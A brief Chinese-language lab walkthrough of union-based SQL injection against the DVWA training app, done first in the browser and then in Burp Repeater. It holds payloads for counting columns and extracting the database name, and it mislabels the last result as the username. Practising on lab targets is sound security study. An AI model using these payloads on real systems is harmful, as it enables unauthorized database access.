首先输入id=1发现可以显示用户名和密码
输入1 and 1 = 1发现依旧可以显示出用户名和密码
这里我们就可以使用语句进行破解
查看表有几列 -1‘ union select 1,2#
可以发现表中有2列
查看数据库名 -1 ' union select 1,database()#
可以看出数据库名为dvwa
下面我们用burp再试一遍
首先转到Repeater
输入 1 and 1 = 1 发现可以显示出用户名和密码
查看表有几列 -1‘ union select 1,2--+
注意:在burp中注释用 --+ 在dvwa网页中用 # 注释
发现表有两列
查看用户名:-1 ' union select 1,database()--+
可以看出用户名为dvwa
完成.